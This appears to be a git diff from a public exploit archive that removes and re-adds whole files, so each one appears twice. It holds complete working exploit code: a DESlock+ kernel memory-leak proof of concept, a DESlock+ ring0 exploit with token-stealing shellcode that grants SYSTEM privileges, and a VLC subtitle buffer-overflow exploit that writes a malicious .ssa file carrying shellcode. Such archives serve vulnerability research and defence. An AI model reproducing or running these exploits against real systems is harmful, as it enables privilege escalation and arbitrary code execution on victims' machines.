(hFile); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2008-02-18] +/* deslock-list-leak.c + * + * Copyright (c) 2008 by + * + * DESlock+ <= 3.2.6 local kernel mem leak POC + * by mu-b - Fri 21 Dec 2007 + * + * - Tested on: DLMFENC.sys 1.0.0.26 + * + * kernel pool memory leak by continually allocating link list + * structures and never freeing them. This is not without a sense + * of irony in that each element must correspond to a unique + * ProcessID (arg[0]). Thus, adding a single element incurs a + * linear cost due to search :(. (O((n^2+n)/2) overall cost.) + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! + */ + +#include +#include + +#include + +#define DLMFENC_IOCTL 0x0FA4204C +#define DLMFENC_FLAG 0xC001D00D + +#define ARG_SIZE(a) ((a-(sizeof (int)*2))/sizeof (void *)) + +struct ioctl_req { + int flag; + int req_num; + void *arg[ARG_SIZE(0x20)]; +}; + +static void +xor_mask_req (struct ioctl_req *req) +{ + DWORD i, pid; + PCHAR ptr; + + pid = GetCurrentProcessId (); + for (i = 0, ptr = (PCHAR) req; i < 0x0C; i++, ptr++) + *ptr ^= pid; +} + +int +main (int argc, char **argv) +{ + struct ioctl_req req; + DWORD i, rlen; + HANDLE hFile; + BOOL result; + + printf ("DESlock+ <= 3.2.6 local kernel mem leak PoC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); + + hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE, + FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, + OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) + { + fprintf (stderr, "* CreateFileA failed, %d\n", hFile); + exit (EXIT_FAILURE); + } + + memset (&req, 0, sizeof req); + + for (i = 0; i <= UINT_MAX; i++) + { + req.flag = DLMFENC_FLAG; + req.req_num = 0x03; + req.arg[0] = (void *) i; + + xor_mask_req (&req); + result = DeviceIoControl (hFile, DLMFENC_IOCTL, + &req, sizeof req, &req, sizeof req, &rlen, 0); + if (!result) + { + fprintf (stderr, "* DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + + if 
(!(i % 64)) + printf ("%d..", i); + } + + CloseHandle (hFile); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2008-02-18] diff --git a/platforms/windows/local/5144.c b/platforms/windows/local/5144.c index 3cd5e0e66..90684af7f 100755 --- a/platforms/windows/local/5144.c +++ b/platforms/windows/local/5144.c 
@@ -1,343 +1,343 @@ -/* deslock-pown-v2.c - * - * Copyright (c) 2008 by - * - * DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit - * by mu-b - Wed 26 Dec 2007 - * - * - Tested on: DLMFDISK.sys 1.2.0.27 - * - Microsoft Windows 2003 SP2 - * - Microsoft Windows XP SP2 - * - * Note: create a mountable filesystem (size/password is irrelevant), - * name the pseudo-filesystem "XXXAAAA.mnt" and copy to "?:\", - * finally mount the pseudo-filesystem and ./deslock-pown-v2 for SYSTEM. - * - * Compile: MinGW + -lntdll - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! - */ - -#include -#include - -#include -#include - -#define DLKFDISK_IOCTL 0x80002024 -#define DLKFDISK_R_IOCTL 0x80002010 -#define DLKFDISK_SLOT 0x00000C5A -#define DLKFDISK_OFFSET 0x0D -#define DLKFDISK_DISK_MAX 0x1A - -static unsigned char win32_fixup[] = - "\x53" - "\xeb\x0e" - /* _fixup_copy */ - "\x5e" - "\xbf\x5c\x0c\x00\x00" - "\x31\xc9" - "\xb1\x05" - "\xf3\xa5" - "\xeb\x19" - /* _fixup_blk */ - "\xe8\xed\xff\xff\xff" - "\x64\x0a\x00\x00" - "\xd3\x0a\x00\x00" - "\x2a\x0a\x00\x00" - "\x49\x0a\x00\x00" - "\x68\x0b\x00\x00"; - -/* Win2k3 SP1/2 - kernel EPROCESS token switcher - * by mu-b - */ -static unsigned char win2k3_ring0_shell[] = - /* _ring0 */ - "\xb8\x24\xf1\xdf\xff" - "\x8b\x00" - "\x8b\xb0\x18\x02\x00\x00" - "\x89\xf0" - /* _sys_eprocess_loop */ - "\x8b\x98\x94\x00\x00\x00" - "\x81\xfb\x04\x00\x00\x00" - "\x74\x11" - "\x8b\x80\x9c\x00\x00\x00" - "\x2d\x98\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - "\xeb\x21" - /* _sys_eprocess_found */ - "\x89\xc1" - "\x89\xf0" - - /* _cmd_eprocess_loop */ - "\x8b\x98\x94\x00\x00\x00" - "\x81\xfb\x00\x00\x00\x00" - "\x74\x10" - "\x8b\x80\x9c\x00\x00\x00" - "\x2d\x98\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - /* _not_found */ - "\xcc" - /* _cmd_eprocess_found - * _ring0_end */ - - /* copy tokens!$%! 
*/ - "\x8b\x89\xd8\x00\x00\x00" - "\x89\x88\xd8\x00\x00\x00" - "\x90"; - -static unsigned char winxp_ring0_shell[] = - /* _ring0 */ - "\xb8\x24\xf1\xdf\xff" - "\x8b\x00" - "\x8b\x70\x44" - "\x89\xf0" - /* _sys_eprocess_loop */ - "\x8b\x98\x84\x00\x00\x00" - "\x81\xfb\x04\x00\x00\x00" - "\x74\x11" - "\x8b\x80\x8c\x00\x00\x00" - "\x2d\x88\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - "\xeb\x21" - /* _sys_eprocess_found */ - "\x89\xc1" - "\x89\xf0" - - /* _cmd_eprocess_loop */ - "\x8b\x98\x84\x00\x00\x00" - "\x81\xfb\x00\x00\x00\x00" - "\x74\x10" - "\x8b\x80\x8c\x00\x00\x00" - "\x2d\x88\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - /* _not_found */ - "\xcc" - /* _cmd_eprocess_found - * _ring0_end */ - - /* copy tokens!$%! */ - "\x8b\x89\xc8\x00\x00\x00" - "\x89\x88\xc8\x00\x00\x00" - "\x90"; - -static unsigned char win32_ret[] = - "\x5b" - "\x31\xff" - "\xb8\xdc\x0b\x00\x00" - "\xff\xe0" - "\xcc"; - -struct ioctl_req { - void *arg[20]; -}; - -static PCHAR -fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen) -{ - DWORD dwVersion, dwMajorVersion, dwMinorVersion; - - dwVersion = GetVersion (); - dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion))); - dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion))); - - if (dwMajorVersion != 5) - { - fprintf (stderr, "* GetVersion, unsupported version\n"); - exit (EXIT_FAILURE); - } - - *(PDWORD) &win32_fixup[5] += (DWORD) base; - *(PDWORD) &win32_fixup[22] += (DWORD) base; - *(PDWORD) &win32_fixup[26] += (DWORD) base; - *(PDWORD) &win32_fixup[30] += (DWORD) base; - *(PDWORD) &win32_fixup[34] += (DWORD) base; - *(PDWORD) &win32_fixup[38] += (DWORD) base; - - *(PDWORD) &win32_ret[4] += (DWORD) base; - - switch (dwMinorVersion) - { - case 1: - *zlen = sizeof winxp_ring0_shell - 1; - *(PDWORD) &winxp_ring0_shell[55] = ppid; - return (winxp_ring0_shell); - - case 2: - *zlen = sizeof win2k3_ring0_shell - 1; - *(PDWORD) &win2k3_ring0_shell[58] = ppid; - return (win2k3_ring0_shell); - - default: - fprintf (stderr, "* GetVersion, unsupported 
version\n"); - exit (EXIT_FAILURE); - } - - return (NULL); -} - -static PVOID -get_module_base (void) -{ - PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase; - PSYSTEM_MODULE_INFORMATION pModuleInfo; - DWORD i, num_modules, status, rlen; - PVOID result; - - status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen); - if (status != STATUS_INFO_LENGTH_MISMATCH) - { - fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status); - exit (EXIT_FAILURE); - } - - pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen); - - status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen); - if (status != STATUS_SUCCESS) - { - fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status); - exit (EXIT_FAILURE); - } - - num_modules = pModuleInfo->Count; - pModuleBase = &pModuleInfo->Module[0]; - result = NULL; - - for (i = 0; i < num_modules; i++, pModuleBase++) - if (strstr (pModuleBase->ImageName, "dlkfdisk.sys")) - { - result = pModuleBase->Base; - break; - } - - HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo); - - return (result); -} - -int -main (int argc, char **argv) -{ - struct ioctl_req req; - DWORD disk_no, i, rlen, zlen, ppid; - CHAR rbuf[64], sbuf[512]; - LPVOID zpage, zbuf, base; - HANDLE hFile; - BOOL result; - - printf ("DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); - - if (argc <= 1) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - ppid = atoi (argv[1]); - - hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE, - FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, - OPEN_EXISTING, 0, NULL); - if (hFile == INVALID_HANDLE_VALUE) - { - fprintf (stderr, "* CreateFileA failed, %d\n", hFile); - exit (EXIT_FAILURE); - } - - for (i = 0; i < DLKFDISK_DISK_MAX; i++) - { - memset (&req, 0, sizeof req); - req.arg[0] = (void *) 0xDEADBEEF; - req.arg[1] = (void 
*) 0xDEADBEEF; - req.arg[2] = (void *) 0xDEADBEEF; - req.arg[3] = (void *) i; /* drive number */ - req.arg[4] = (void *) sizeof sbuf; /* buffer size */ - req.arg[5] = (void *) sbuf; /* buffer pointer */ - - result = DeviceIoControl (hFile, DLKFDISK_IOCTL, - &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0); - if (!result) - { - fprintf (stderr, "* DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - - if (strlen (sbuf + DLKFDISK_OFFSET - 1) > 6 && - strcmp (sbuf + DLKFDISK_OFFSET - 1 + 6, ":\\XXXAAAA.mnt") == 0) - { - disk_no = i; - break; - } - } - printf ("* write buf: \"%s\"\n", &sbuf[DLKFDISK_OFFSET - 1]); - - zpage = VirtualAlloc ((LPVOID) 0x41410000, 0x10000, - MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); - if (zpage == NULL) - { - fprintf (stderr, "* VirtualAlloc failed\n"); - exit (EXIT_FAILURE); - } - printf ("* allocated page: 0x%08X [%d-bytes]\n", - zpage, 0x10000); - - base = get_module_base (); - if (base == NULL) - { - fprintf (stderr, "* unable to find dlkfdisk.sys base\n"); - exit (EXIT_FAILURE); - } - printf ("* dlkfdisk.sys base: 0x%08X\n", base); - - memset (zpage, 0xCC, 0x10000); - zbuf = fixup_ring0_shell (base, ppid, &zlen); - memcpy ((LPVOID) 0x41414141, win32_fixup, sizeof (win32_fixup) - 1); - memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) - 1), zbuf, zlen); - memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) + zlen - 1), - win32_ret, sizeof (win32_ret) - 1); - - memset (&req, 0, sizeof req); - req.arg[0] = (void *) 0xDEADBEEF; - req.arg[1] = (void *) 0xDEADBEEF; - req.arg[2] = (void *) 0xDEADBEEF; - req.arg[3] = (void *) disk_no; /* drive number */ - req.arg[4] = (void *) 512; /* buffer size */ - req.arg[5] = (void *) (base + DLKFDISK_SLOT - DLKFDISK_OFFSET); /* buffer pointer */ - - printf ("* overwriting [@0x%08X %d-bytes].. 
", - base + DLKFDISK_SLOT, strlen (sbuf + DLKFDISK_OFFSET - 1) + 1); - result = DeviceIoControl (hFile, DLKFDISK_IOCTL, - &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0); - if (!result) - { - fprintf (stderr, "DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - printf ("done\n"); - - /* jump to our address :) */ - printf ("* jumping.. "); - result = DeviceIoControl (hFile, DLKFDISK_R_IOCTL, - &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0); - if (!result) - { - fprintf (stderr, "DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - printf ("done\n\n" - "* hmmm, you didn't STOP the box?!?!\n"); - - CloseHandle (hFile); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2008-02-18] +/* deslock-pown-v2.c + * + * Copyright (c) 2008 by + * + * DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit + * by mu-b - Wed 26 Dec 2007 + * + * - Tested on: DLMFDISK.sys 1.2.0.27 + * - Microsoft Windows 2003 SP2 + * - Microsoft Windows XP SP2 + * + * Note: create a mountable filesystem (size/password is irrelevant), + * name the pseudo-filesystem "XXXAAAA.mnt" and copy to "?:\", + * finally mount the pseudo-filesystem and ./deslock-pown-v2 for SYSTEM. + * + * Compile: MinGW + -lntdll + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! 
+ */ + +#include +#include + +#include +#include + +#define DLKFDISK_IOCTL 0x80002024 +#define DLKFDISK_R_IOCTL 0x80002010 +#define DLKFDISK_SLOT 0x00000C5A +#define DLKFDISK_OFFSET 0x0D +#define DLKFDISK_DISK_MAX 0x1A + +static unsigned char win32_fixup[] = + "\x53" + "\xeb\x0e" + /* _fixup_copy */ + "\x5e" + "\xbf\x5c\x0c\x00\x00" + "\x31\xc9" + "\xb1\x05" + "\xf3\xa5" + "\xeb\x19" + /* _fixup_blk */ + "\xe8\xed\xff\xff\xff" + "\x64\x0a\x00\x00" + "\xd3\x0a\x00\x00" + "\x2a\x0a\x00\x00" + "\x49\x0a\x00\x00" + "\x68\x0b\x00\x00"; + +/* Win2k3 SP1/2 - kernel EPROCESS token switcher + * by mu-b + */ +static unsigned char win2k3_ring0_shell[] = + /* _ring0 */ + "\xb8\x24\xf1\xdf\xff" + "\x8b\x00" + "\x8b\xb0\x18\x02\x00\x00" + "\x89\xf0" + /* _sys_eprocess_loop */ + "\x8b\x98\x94\x00\x00\x00" + "\x81\xfb\x04\x00\x00\x00" + "\x74\x11" + "\x8b\x80\x9c\x00\x00\x00" + "\x2d\x98\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + "\xeb\x21" + /* _sys_eprocess_found */ + "\x89\xc1" + "\x89\xf0" + + /* _cmd_eprocess_loop */ + "\x8b\x98\x94\x00\x00\x00" + "\x81\xfb\x00\x00\x00\x00" + "\x74\x10" + "\x8b\x80\x9c\x00\x00\x00" + "\x2d\x98\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + /* _not_found */ + "\xcc" + /* _cmd_eprocess_found + * _ring0_end */ + + /* copy tokens!$%! */ + "\x8b\x89\xd8\x00\x00\x00" + "\x89\x88\xd8\x00\x00\x00" + "\x90"; + +static unsigned char winxp_ring0_shell[] = + /* _ring0 */ + "\xb8\x24\xf1\xdf\xff" + "\x8b\x00" + "\x8b\x70\x44" + "\x89\xf0" + /* _sys_eprocess_loop */ + "\x8b\x98\x84\x00\x00\x00" + "\x81\xfb\x04\x00\x00\x00" + "\x74\x11" + "\x8b\x80\x8c\x00\x00\x00" + "\x2d\x88\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + "\xeb\x21" + /* _sys_eprocess_found */ + "\x89\xc1" + "\x89\xf0" + + /* _cmd_eprocess_loop */ + "\x8b\x98\x84\x00\x00\x00" + "\x81\xfb\x00\x00\x00\x00" + "\x74\x10" + "\x8b\x80\x8c\x00\x00\x00" + "\x2d\x88\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + /* _not_found */ + "\xcc" + /* _cmd_eprocess_found + * _ring0_end */ + + /* copy tokens!$%! 
*/ + "\x8b\x89\xc8\x00\x00\x00" + "\x89\x88\xc8\x00\x00\x00" + "\x90"; + +static unsigned char win32_ret[] = + "\x5b" + "\x31\xff" + "\xb8\xdc\x0b\x00\x00" + "\xff\xe0" + "\xcc"; + +struct ioctl_req { + void *arg[20]; +}; + +static PCHAR +fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen) +{ + DWORD dwVersion, dwMajorVersion, dwMinorVersion; + + dwVersion = GetVersion (); + dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion))); + dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion))); + + if (dwMajorVersion != 5) + { + fprintf (stderr, "* GetVersion, unsupported version\n"); + exit (EXIT_FAILURE); + } + + *(PDWORD) &win32_fixup[5] += (DWORD) base; + *(PDWORD) &win32_fixup[22] += (DWORD) base; + *(PDWORD) &win32_fixup[26] += (DWORD) base; + *(PDWORD) &win32_fixup[30] += (DWORD) base; + *(PDWORD) &win32_fixup[34] += (DWORD) base; + *(PDWORD) &win32_fixup[38] += (DWORD) base; + + *(PDWORD) &win32_ret[4] += (DWORD) base; + + switch (dwMinorVersion) + { + case 1: + *zlen = sizeof winxp_ring0_shell - 1; + *(PDWORD) &winxp_ring0_shell[55] = ppid; + return (winxp_ring0_shell); + + case 2: + *zlen = sizeof win2k3_ring0_shell - 1; + *(PDWORD) &win2k3_ring0_shell[58] = ppid; + return (win2k3_ring0_shell); + + default: + fprintf (stderr, "* GetVersion, unsupported version\n"); + exit (EXIT_FAILURE); + } + + return (NULL); +} + +static PVOID +get_module_base (void) +{ + PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase; + PSYSTEM_MODULE_INFORMATION pModuleInfo; + DWORD i, num_modules, status, rlen; + PVOID result; + + status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen); + if (status != STATUS_INFO_LENGTH_MISMATCH) + { + fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status); + exit (EXIT_FAILURE); + } + + pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen); + + status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen); + if (status != STATUS_SUCCESS) + { + fprintf 
(stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status); + exit (EXIT_FAILURE); + } + + num_modules = pModuleInfo->Count; + pModuleBase = &pModuleInfo->Module[0]; + result = NULL; + + for (i = 0; i < num_modules; i++, pModuleBase++) + if (strstr (pModuleBase->ImageName, "dlkfdisk.sys")) + { + result = pModuleBase->Base; + break; + } + + HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo); + + return (result); +} + +int +main (int argc, char **argv) +{ + struct ioctl_req req; + DWORD disk_no, i, rlen, zlen, ppid; + CHAR rbuf[64], sbuf[512]; + LPVOID zpage, zbuf, base; + HANDLE hFile; + BOOL result; + + printf ("DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); + + if (argc <= 1) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + ppid = atoi (argv[1]); + + hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE, + FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, + OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) + { + fprintf (stderr, "* CreateFileA failed, %d\n", hFile); + exit (EXIT_FAILURE); + } + + for (i = 0; i < DLKFDISK_DISK_MAX; i++) + { + memset (&req, 0, sizeof req); + req.arg[0] = (void *) 0xDEADBEEF; + req.arg[1] = (void *) 0xDEADBEEF; + req.arg[2] = (void *) 0xDEADBEEF; + req.arg[3] = (void *) i; /* drive number */ + req.arg[4] = (void *) sizeof sbuf; /* buffer size */ + req.arg[5] = (void *) sbuf; /* buffer pointer */ + + result = DeviceIoControl (hFile, DLKFDISK_IOCTL, + &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0); + if (!result) + { + fprintf (stderr, "* DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + + if (strlen (sbuf + DLKFDISK_OFFSET - 1) > 6 && + strcmp (sbuf + DLKFDISK_OFFSET - 1 + 6, ":\\XXXAAAA.mnt") == 0) + { + disk_no = i; + break; + } + } + printf ("* write buf: \"%s\"\n", &sbuf[DLKFDISK_OFFSET - 1]); + + zpage = VirtualAlloc ((LPVOID) 0x41410000, 0x10000, + MEM_RESERVE|MEM_COMMIT, 
PAGE_EXECUTE_READWRITE); + if (zpage == NULL) + { + fprintf (stderr, "* VirtualAlloc failed\n"); + exit (EXIT_FAILURE); + } + printf ("* allocated page: 0x%08X [%d-bytes]\n", + zpage, 0x10000); + + base = get_module_base (); + if (base == NULL) + { + fprintf (stderr, "* unable to find dlkfdisk.sys base\n"); + exit (EXIT_FAILURE); + } + printf ("* dlkfdisk.sys base: 0x%08X\n", base); + + memset (zpage, 0xCC, 0x10000); + zbuf = fixup_ring0_shell (base, ppid, &zlen); + memcpy ((LPVOID) 0x41414141, win32_fixup, sizeof (win32_fixup) - 1); + memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) - 1), zbuf, zlen); + memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) + zlen - 1), + win32_ret, sizeof (win32_ret) - 1); + + memset (&req, 0, sizeof req); + req.arg[0] = (void *) 0xDEADBEEF; + req.arg[1] = (void *) 0xDEADBEEF; + req.arg[2] = (void *) 0xDEADBEEF; + req.arg[3] = (void *) disk_no; /* drive number */ + req.arg[4] = (void *) 512; /* buffer size */ + req.arg[5] = (void *) (base + DLKFDISK_SLOT - DLKFDISK_OFFSET); /* buffer pointer */ + + printf ("* overwriting [@0x%08X %d-bytes].. ", + base + DLKFDISK_SLOT, strlen (sbuf + DLKFDISK_OFFSET - 1) + 1); + result = DeviceIoControl (hFile, DLKFDISK_IOCTL, + &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0); + if (!result) + { + fprintf (stderr, "DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + /* jump to our address :) */ + printf ("* jumping.. "); + result = DeviceIoControl (hFile, DLKFDISK_R_IOCTL, + &req, sizeof req, rbuf, sizeof rbuf, &rlen, 0); + if (!result) + { + fprintf (stderr, "DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + printf ("done\n\n" + "* hmmm, you didn't STOP the box?!?!\n"); + + CloseHandle (hFile); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2008-02-18] diff --git a/platforms/windows/local/5250.cpp b/platforms/windows/local/5250.cpp index 46f2e32e3..1e10eafa3 100755 --- a/platforms/windows/local/5250.cpp +++ b/platforms/windows/local/5250.cpp 
@@ -1,94 +1,94 @@ -/* -VLC <=0.8.6.e -Subtitle parsing local buffer overflow exploit -Creadit to cuongmx@gmail.com vs Look2Me @ -Tested on windows XP Pro SP2 - -*/ - -#include -#include -#include - -char ssa_header[]= -"[Script Info]\r\n" -"Title: VLC <= 0.8.6c,e buffer-overflow\r\n" -"ScriptType: v4.00\r\n" -"Collisions: Normal\r\n" -"[V4 Styles]\r\n" -"[Events]\r\n" -"Dialogue:"; - -// execute calculator from Meta -char shellcode[] = -"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d" -"\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c" -"\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90" -"\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4" -"\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf" -"\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd" -"\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52" -"\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1" -"\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b" -"\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9"; - -char szJMP[]= -"\x90\x90\xe9\x38\xff\xff\xff\xeb\xf9\x90\x90\x0b\x0b\x38\x00"; - -char szAVI[]= -"\x52\x49\x46\x46\xC\x0\x0\x0\x41\x56\x49\x20\x4C\x49\x53\x54\x00\x00\x00"; - -main() -{ - int i,j,k; - printf("Give me your VLC version:\r\n"); - printf("1> version 8.06.c\r\n"); - printf("2> version 8.06.d\r\n"); - printf("3> version 8.06.e\r\nChose:"); - j=getchar(); - switch(j) - { - case '1': k=165254;break; - case '2': printf("\r\nI haven't got this version!\r\n Good Luck :-)"); - getchar(); - return 0;break; - case '3': k=165286;break; - } - k=k-sizeof(shellcode); - printf("\r\n[+] Creating .ssa file ..."); - FILE* f; - char szBuffer[170000]; - char szBuffer2[200]; - - strcpy(szBuffer,ssa_header); // header of ssa - - memset((szBuffer+sizeof(ssa_header)-1),'\x90',k); - szBuffer[k+sizeof(ssa_header)]='\x00'; - strcpy(szBuffer2,shellcode); - 
strcat(szBuffer2,szJMP); - strcat(szBuffer,szBuffer2); - - f=fopen("Bof-VLC.ssa","wb"); - if(f==NULL) - { - printf("Can't create file"); - exit; - } - fwrite(szBuffer,1,strlen(szBuffer),f); // write header - fclose(f); - printf("\r\n[+] .ssa file successfully create!"); - - printf("\r\n[+] Creation .avi file ..."); - f=fopen("Bof-VLC.avi","wb"); - if(f==NULL) - { - printf("Can't create file"); - exit; - } - fwrite(szAVI,1,sizeof(szAVI),f); // write header - fclose(f); - printf("\r\n[+] .avi file successfully create!"); - getchar(); -} - -// milw0rm.com [2008-03-14] +/* +VLC <=0.8.6.e +Subtitle parsing local buffer overflow exploit +Creadit to cuongmx@gmail.com vs Look2Me @ +Tested on windows XP Pro SP2 + +*/ + +#include +#include +#include + +char ssa_header[]= +"[Script Info]\r\n" +"Title: VLC <= 0.8.6c,e buffer-overflow\r\n" +"ScriptType: v4.00\r\n" +"Collisions: Normal\r\n" +"[V4 Styles]\r\n" +"[Events]\r\n" +"Dialogue:"; + +// execute calculator from Meta +char shellcode[] = +"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d" +"\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c" +"\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90" +"\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4" +"\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf" +"\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd" +"\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52" +"\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1" +"\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b" +"\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9"; + +char szJMP[]= +"\x90\x90\xe9\x38\xff\xff\xff\xeb\xf9\x90\x90\x0b\x0b\x38\x00"; + +char szAVI[]= +"\x52\x49\x46\x46\xC\x0\x0\x0\x41\x56\x49\x20\x4C\x49\x53\x54\x00\x00\x00"; + +main() +{ + int i,j,k; + printf("Give me your VLC version:\r\n"); + printf("1> version 8.06.c\r\n"); + printf("2> version 8.06.d\r\n"); + 
printf("3> version 8.06.e\r\nChose:"); + j=getchar(); + switch(j) + { + case '1': k=165254;break; + case '2': printf("\r\nI haven't got this version!\r\n Good Luck :-)"); + getchar(); + return 0;break; + case '3': k=165286;break; + } + k=k-sizeof(shellcode); + printf("\r\n[+] Creating .ssa file ..."); + FILE* f; + char szBuffer[170000]; + char szBuffer2[200]; + + strcpy(szBuffer,ssa_header); // header of ssa + + memset((szBuffer+sizeof(ssa_header)-1),'\x90',k); + szBuffer[k+sizeof(ssa_header)]='\x00'; + strcpy(szBuffer2,shellcode); + strcat(szBuffer2,szJMP); + strcat(szBuffer,szBuffer2); + + f=fopen("Bof-VLC.ssa","wb"); + if(f==NULL) + { + printf("Can't create file"); + exit; + } + fwrite(szBuffer,1,strlen(szBuffer),f); // write header + fclose(f); + printf("\r\n[+] .ssa file successfully create!"); + + printf("\r\n[+] Creation .avi file ..."); + f=fopen("Bof-VLC.avi","wb"); + if(f==NULL) + { + printf("Can't create file"); + exit; + } + fwrite(szAVI,1,sizeof(szAVI),f); // write header + fclose(f); + printf("\r\n[+] .avi file successfully create!"); + getchar(); +} + +// milw0rm.com [2008-03-14] diff --git a/platforms/windows/local/5346.pl b/platforms/windows/local/5346.pl index 118b97dba..79684fdbd 100755 --- a/platforms/windows/local/5346.pl +++ b/platforms/windows/local/5346.pl 
